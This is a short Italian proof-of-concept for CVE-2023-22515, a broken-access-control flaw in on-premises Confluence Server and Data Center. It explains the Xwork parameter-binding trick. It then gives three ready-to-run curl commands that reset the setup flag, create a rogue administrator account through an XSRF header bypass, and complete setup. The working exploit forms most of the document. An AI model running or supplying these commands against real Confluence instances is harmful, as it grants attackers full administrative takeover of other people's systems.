
PoC per CVE-2023-22515
CVE-2023-22515, una vulnerabilità critica che colpisce le istanze on-premises di Confluence Server e Confluence Data Center, è una vulnerabilità di Broken Access Control. Attlassian ha fornito un punteggio base CVSS di 10.0
1- A causa di come gli interceptor Xwork analizzano i parametri, /test.action?one=a equivale a setOne()='a'; alternativamente /test.action?one.two=a equivale a getOne().setTwo()="a"
2- Gli endpoint /setup/* includono una chiamata @ParameterSafe che ci permette di usare set e get come in /setup/setupdb.action?dbConfigInfo.databaseType=postgresql, tuttavia, poiché gli endpoint /setup/* sono bloccati perché la configurazione è completa, è possibile usare /server-info.action
3- Trova il metodo set per completare la configurazione => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- Usa l'header "X-Atlassian-Token" per bypassare XSRF
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
DISCLAIMER: L'exploit non è stato scoperto o realizzato da me; il merito va agli articoli qui sotto
https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis